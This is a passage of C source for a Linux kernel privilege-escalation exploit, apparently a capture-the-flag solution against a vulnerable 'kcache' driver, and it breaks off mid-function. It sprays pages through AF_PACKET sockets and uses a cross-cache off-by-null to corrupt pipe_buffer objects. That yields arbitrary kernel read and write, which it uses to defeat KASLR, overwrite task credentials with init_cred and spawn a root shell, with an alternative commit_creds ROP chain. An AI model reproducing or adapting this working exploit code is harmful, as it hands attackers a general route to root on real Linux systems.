return ioctl(dev_fd, KCACHE_READ, &cmd);
}

int kcache_free(int index)
{
struct kcache_cmd cmd = {
.idx = index,
};

return ioctl(dev_fd, KCACHE_FREE, &cmd);
}

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* tpacket version for setsockopt */
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

usleep(10000);

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

/**
* IV - config for page-level heap spray and heap fengshui
*/
#define PIPE_SPRAY_NUM 200

#define PGV_1PAGE_SPRAY_NUM 0x20

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/* spray pages in different size for various usages */
void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}

/* for pipe escalation */
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int pipe_fd[PIPE_SPRAY_NUM][2];
int orig_pid = -1, victim_pid = -1;
int snd_orig_pid = -1, snd_vicitm_pid = -1;
int self_2nd_pipe_pid = -1, self_3rd_pipe_pid = -1, self_4th_pipe_pid = -1;

struct pipe_buffer info_pipe_buf;

int extend_pipe_buffer_to_4k(int start_idx, int nr)
{
for (int i = 0; i < nr; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_fd[start_idx + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
printf("[x] failed to extend %d pipe!\n", start_idx + i);
return -1;
}
}

return 0;
}

/**
* V - FIRST exploit stage - cross-cache overflow to make page-level UAF
*/

void corrupting_first_level_pipe_for_page_uaf(void)
{
char buf[0x1000];

puts("[*] spray pipe_buffer...");
for (int i = 0; i < PIPE_SPRAY_NUM; i ++) {

if (pipe(pipe_fd[i]) < 0) {
printf("[x] failed to alloc %d pipe!", i);
err_exit("FAILED to create pipe!");
}
}

/* spray pipe_buffer on order-2 pages, make vul-obj slub around with that.*/

puts("[*] exetend pipe_buffer...");
if (extend_pipe_buffer_to_4k(0, PIPE_SPRAY_NUM / 2) < 0) {
err_exit("FAILED to extend pipe!");
}

puts("[*] spray vulnerable 2k obj...");
free_page(pgv_8pages_start_idx++);
for (int i = 0; i < KCACHE_NUM; i++) {
kcache_alloc(i, 8, "arttnba3");
}

puts("[*] exetend pipe_buffer...");
if (extend_pipe_buffer_to_4k(PIPE_SPRAY_NUM / 2, PIPE_SPRAY_NUM / 2) < 0) {
err_exit("FAILED to extend pipe!");
}

puts("[*] allocating pipe pages...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8); /* prevent pipe_release() */
}

/* try to trigger cross-cache overflow */
puts("[*] trigerring cross-cache off-by-null...");
for (int i = 0; i < KCACHE_NUM; i++) {
kcache_append(i, KCACHE_SIZE - 8, buf);
}

/* checking for cross-cache overflow */
puts("[*] checking for corruption...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
char a3_str[0x10];
int nr;

memset(a3_str, '\0', sizeof(a3_str));
read(pipe_fd[i][0], a3_str, 8);
read(pipe_fd[i][0], &nr, sizeof(int));
if (!strcmp(a3_str, "arttnba3") && nr != i) {
orig_pid = nr;
victim_pid = i;
printf("\033[32m\033[1m[+] Found victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n\n",
victim_pid, orig_pid);
break;
}
}

if (victim_pid == -1) {
err_exit("FAILED to corrupt pipe_buffer!");
}
}

void corrupting_second_level_pipe_for_pipe_uaf(void)
{
size_t buf[0x1000];
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ/sizeof(struct pipe_buffer));

memset(buf, '\0', sizeof(buf));

/* let the page's ptr at pipe_buffer */
write(pipe_fd[victim_pid][1], buf, SND_PIPE_BUF_SZ*2 - 24 - 3*sizeof(int));

/* free orignal pipe's page */
puts("[*] free original pipe...");
close(pipe_fd[orig_pid][0]);
close(pipe_fd[orig_pid][1]);

/* try to rehit victim page by reallocating pipe_buffer */
puts("[*] fcntl() to set the pipe_buffer on victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid) {
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0) {
printf("[x] failed to resize %d pipe!\n", i);
err_exit("FAILED to re-alloc pipe_buffer!");
}
}

/* read victim page to check whether we've successfully hit it */
read(pipe_fd[victim_pid][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
read(pipe_fd[victim_pid][0], &info_pipe_buf, sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

if ((size_t) info_pipe_buf.page < 0xffff000000000000
|| (size_t) info_pipe_buf.ops < 0xffffffff81000000) {
err_exit("FAILED to re-hit victim page!");
}

puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");
printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);
puts("");

/* construct a second-level page uaf */
puts("[*] construct a second-level uaf pipe page...");
info_pipe_buf.page = (struct page*) ((size_t) info_pipe_buf.page + 0x40);
write(pipe_fd[victim_pid][1], &info_pipe_buf, sizeof(info_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
int nr;

if (i == orig_pid || i == victim_pid) {
continue;
}

read(pipe_fd[i][0], &nr, sizeof(nr));
if (nr < PIPE_SPRAY_NUM && i != nr) {
snd_orig_pid = nr;
snd_vicitm_pid = i;
printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n",
snd_vicitm_pid, snd_orig_pid);
break;
}
}

if (snd_vicitm_pid == -1) {
err_exit("FAILED to corrupt second-level pipe_buffer!");
}
}

/**
* VI - SECONDARY exploit stage: build pipe for arbitrary read & write
*/

void building_self_writing_pipe(void)
{
size_t buf[0x1000];
size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf, 0, sizeof(buf));

/* let the page's ptr at pipe_buffer */
write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - 24 -3*sizeof(int));

/* free orignal pipe's page */
puts("[*] free second-level original pipe...");
close(pipe_fd[snd_orig_pid][0]);
close(pipe_fd[snd_orig_pid][1]);

/* try to rehit victim page by reallocating pipe_buffer */
puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid) {
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0) {
printf("[x] failed to resize %d pipe!\n", i);
err_exit("FAILED to re-alloc pipe_buffer!");
}
}

/* let a pipe->bufs pointing to itself */
puts("[*] hijacking the 2nd pipe_buffer on page to itself...");
evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

/* check for third-level victim pipe */
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid) {
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page) {
self_2nd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n",
self_2nd_pipe_pid);
break;
}
}

if (self_2nd_pipe_pid == -1) {
err_exit("FAILED to build a self-writing pipe!");
}

/* overwrite the 3rd pipe_buffer to this page too */
puts("[*] hijacking the 3rd pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

/* check for third-level victim pipe */
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid
|| i == self_2nd_pipe_pid) {
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page) {
self_3rd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n", self_3rd_pipe_pid);
break;
}
}

if (self_3rd_pipe_pid == -1) {
err_exit("FAILED to build a self-writing pipe!");
}

/* overwrite the 4th pipe_buffer to this page too */
puts("[*] hijacking the 4th pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

/* check for third-level victim pipe */
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid
|| i == self_2nd_pipe_pid || i== self_3rd_pipe_pid) {
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page) {
self_4th_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n", self_4th_pipe_pid);
break;
}
}

if (self_4th_pipe_pid == -1) {
err_exit("FAILED to build a self-writing pipe!");
}

puts("");
}

struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000]= { '\0' };

/**
* @brief Setting up 3 pipes for arbitrary read & write.
* We need to build a circle there for continuously memory seeking:
* - 2nd pipe to search
* - 3rd pipe to change 4th pipe
* - 4th pipe to change 2nd and 3rd pipe
*/
void setup_evil_pipe(void)
{
/* init the initial val for 2nd,3rd and 4th pipe, for recovering only */
memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

/* hijack the 3rd pipe pointing to 4th */
evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;
}

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
/* page to read */
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary read */
write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ-sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* read out data */
read(pipe_fd[self_2nd_pipe_pid][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
/* page to write */
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary read, 3rd pipe point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* write data into dst page */
write(pipe_fd[self_2nd_pipe_pid][1], src, len);
}

/**
* VII - FINAL exploit stage with arbitrary read & write
*/

size_t *tsk_buf, current_task_page, current_task, parent_task, buf[0x1000];


void info_leaking_by_arbitrary_pipe()
{
size_t *comm_addr;

memset(buf, 0, sizeof(buf));

puts("[*] Setting up kernel arbitrary read & write...");
setup_evil_pipe();

/**
* KASLR's granularity is 256MB, and pages of size 0x1000000 is 1GB MEM,
* so we can simply get the vmemmap_base like this in a SMALL-MEM env.
* For MEM > 1GB, we can just find the secondary_startup_64 func ptr,
* which is located on physmem_base + 0x9d000, i.e., vmemmap_base[156] page.
* If the func ptr is not there, just vmemmap_base -= 256MB and do it again.
*/
vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
for (;;) {
arbitrary_read_by_pipe((struct page*) (vmemmap_base + 157 * 0x40), buf);

if (buf[0] > 0xffffffff81000000 && ((buf[0] & 0xfff) == 0x070)) {
kernel_base = buf[0] - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

/* now seeking for the task_struct in kernel memory */
puts("[*] Seeking task_struct in memory...");

prctl(PR_SET_NAME, "arttnba3pwnn");

/**
* For a machine with MEM less than 256M, we can simply get the:
* page_offset_base = heap_leak & 0xfffffffff0000000;
* But that's not always accurate, espacially on a machine with MEM > 256M.
* So we need to find another way to calculate the page_offset_base.
*
* Luckily the task_struct::ptraced points to itself, so we can get the
* page_offset_base by vmmemap and current task_struct as we know the page.
*
* Note that the offset of different filed should be referred to your env.
*/
for (int i = 0; 1; i++) {
arbitrary_read_by_pipe((struct page*) (vmemmap_base + i * 0x40), buf);

comm_addr = memmem(buf, 0xf00, "arttnba3pwnn", 12);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-57] > 0xffff888000000000) /* task->read_parent */
&& (comm_addr[-56] > 0xffff888000000000)) { /* task->parent */

/* task->read_parent */
parent_task = comm_addr[-57];

/* task_struct::ptraced */
current_task = comm_addr[-50] - 2528;

page_offset_base = (comm_addr[-50]&0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page*) (vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
"0x%lx\n\n", current_task);
break;
}
}
}

/**
* @brief find the init_task and copy something to current task_struct
*/
void privilege_escalation_by_task_overwrite(void)
{
/* finding the init_task, the final parent of every task */
puts("[*] Seeking for init_task...");

for (;;) {
size_t ptask_page_addr = direct_map_addr_to_page_addr(parent_task);

tsk_buf = (size_t*) ((size_t) buf + (parent_task & 0xfff));

arbitrary_read_by_pipe((struct page*) ptask_page_addr, buf);
arbitrary_read_by_pipe((struct page*) (ptask_page_addr+0x40),&buf[512]);

/* task_struct::real_parent */
if (parent_task == tsk_buf[309]) {
break;
}

parent_task = tsk_buf[309];
}

init_task = parent_task;
init_cred = tsk_buf[363];
init_nsproxy = tsk_buf[377];

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n",init_nsproxy);

/* now, changing the current task_struct to get the full root :) */
puts("[*] Escalating ROOT privilege now...");

current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page*) current_task_page, buf);
arbitrary_read_by_pipe((struct page*) (current_task_page+0x40), &buf[512]);

tsk_buf = (size_t*) ((size_t) buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page*) current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page*) (current_task_page+0x40),
&buf[512], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_root_shell();
}

#define PTE_OFFSET 12
#define PMD_OFFSET 21
#define PUD_OFFSET 30
#define PGD_OFFSET 39

#define PT_ENTRY_MASK 0b111111111UL
#define PTE_MASK (PT_ENTRY_MASK << PTE_OFFSET)
#define PMD_MASK (PT_ENTRY_MASK << PMD_OFFSET)
#define PUD_MASK (PT_ENTRY_MASK << PUD_OFFSET)
#define PGD_MASK (PT_ENTRY_MASK << PGD_OFFSET)

#define PTE_ENTRY(addr) ((addr >> PTE_OFFSET) & PT_ENTRY_MASK)
#define PMD_ENTRY(addr) ((addr >> PMD_OFFSET) & PT_ENTRY_MASK)
#define PUD_ENTRY(addr) ((addr >> PUD_OFFSET) & PT_ENTRY_MASK)
#define PGD_ENTRY(addr) ((addr >> PGD_OFFSET) & PT_ENTRY_MASK)

#define PAGE_ATTR_RW (1UL << 1)
#define PAGE_ATTR_NX (1UL << 63)

size_t pgd_addr, mm_struct_addr, *mm_struct_buf;
size_t stack_addr, stack_addr_another;
size_t stack_page, mm_struct_page;

size_t vaddr_resolve(size_t pgd_addr, size_t vaddr)
{
size_t buf[0x1000];
size_t pud_addr, pmd_addr, pte_addr, pte_val;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (buf[PGD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (buf[PUD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (buf[PMD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pte_addr), buf);
pte_val = (buf[PTE_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);

return pte_val;
}

size_t vaddr_resolve_for_3_level(size_t pgd_addr, size_t vaddr)
{
size_t buf[0x1000];
size_t pud_addr, pmd_addr;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (buf[PGD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (buf[PUD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pmd_addr), buf);
return (buf[PMD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
}

void vaddr_remapping(size_t pgd_addr, size_t vaddr, size_t paddr)
{
size_t buf[0x1000];
size_t pud_addr, pmd_addr, pte_addr;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (buf[PGD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (buf[PUD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (buf[PMD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pte_addr), buf);
buf[PTE_ENTRY(vaddr)] = paddr | 0x8000000000000867; /* mark it writable */
arbitrary_write_by_pipe((void*) direct_map_addr_to_page_addr(pte_addr), buf,
0xff0);
}

void pgd_vaddr_resolve(void)
{
puts("[*] Reading current task_struct...");

/* read current task_struct */
current_task_page = direct_map_addr_to_page_addr(current_task);
arbitrary_read_by_pipe((struct page*) current_task_page, buf);
arbitrary_read_by_pipe((struct page*) (current_task_page+0x40), &buf[512]);

tsk_buf = (size_t*) ((size_t) buf + (current_task & 0xfff));
stack_addr = tsk_buf[4];
mm_struct_addr = tsk_buf[292];

printf("\033[34m\033[1m[*] kernel stack's addr:\033[0m0x%lx\n",stack_addr);
printf("\033[34m\033[1m[*] mm_struct's addr:\033[0m0x%lx\n",mm_struct_addr);

mm_struct_page = direct_map_addr_to_page_addr(mm_struct_addr);

printf("\033[34m\033[1m[*] mm_struct's page:\033[0m0x%lx\n",mm_struct_page);

/* read mm_struct */
arbitrary_read_by_pipe((struct page*) mm_struct_page, buf);
arbitrary_read_by_pipe((struct page*) (mm_struct_page+0x40), &buf[512]);

mm_struct_buf = (size_t*) ((size_t) buf + (mm_struct_addr & 0xfff));

/* only this is a virtual addr, others in page table are all physical addr*/
pgd_addr = mm_struct_buf[9];

printf("\033[32m\033[1m[+] Got kernel page table of current task:\033[0m"
"0x%lx\n\n", pgd_addr);
}

/**
* It may also be okay to write ROP chain on pipe_write's stack, if there's
* no CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT(it can also be bypass by RETs).
* But what I want is a more novel and general exploitation that
* doesn't need any information about the kernel image.
* So just simply overwrite the task_struct is good :)
*
* If you still want a normal ROP, refer to following codes.
*/

#define COMMIT_CREDS 0xffffffff811284e0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff82201a90
#define INIT_CRED 0xffffffff83079ee8
#define POP_RDI_RET 0xffffffff810157a9
#define RET 0xffffffff810157aa

void privilege_escalation_by_rop(void)
{
size_t rop[0x1000], idx = 0;

/* resolving some vaddr */
pgd_vaddr_resolve();

/* reading the page table directly to get physical addr of kernel stack*/
puts("[*] Reading page table...");

stack_addr_another = vaddr_resolve(pgd_addr, stack_addr);
stack_addr_another &= (~PAGE_ATTR_NX); /* N/X bit */
stack_addr_another += page_offset_base;

printf("\033[32m\033[1m[+] Got another virt addr of kernel stack: \033[0m"
"0x%lx\n\n", stack_addr_another);

/* construct the ROP */
for (int i = 0; i < ((0x1000 - 0x100) / 8); i++) {
rop[idx++] = RET + kernel_offset;
}

rop[idx++] = POP_RDI_RET + kernel_offset;
rop[idx++] = INIT_CRED + kernel_offset;
rop[idx++] = COMMIT_CREDS + kernel_offset;
rop[idx++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE +54 + kernel_offset;
rop[idx++] = *(size_t*) "arttnba3";
rop[idx++] = *(size_t*) "arttnba3";
rop[idx++] = (size_t) get_root_shell;
rop[idx++] = user_cs;
rop[idx++] = user_rflags;
rop[idx++] = user_sp;
rop[idx++] = user_ss;

stack_page = direct_map_addr_to_page_addr(stack_addr_another);

puts("[*] Hijacking current task's stack...");

sleep(5);

arbitrary_write_by_pipe((struct page*) (stack_page + 0x40 * 3), rop, 0xff0);
}

void privilege_escalation_by_usma(void)
{
#define NS_CAPABLE_SETID 0xffffffff810fd2a0

char *kcode_map, *kcode_func;
size_t dst_paddr, dst_vaddr, *rop, idx = 0;

/* resolving some vaddr */
pgd_vaddr_resolve();

kcode_map = mmap((void*) 0x114514000, 0x2000, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (!kcode_map) {
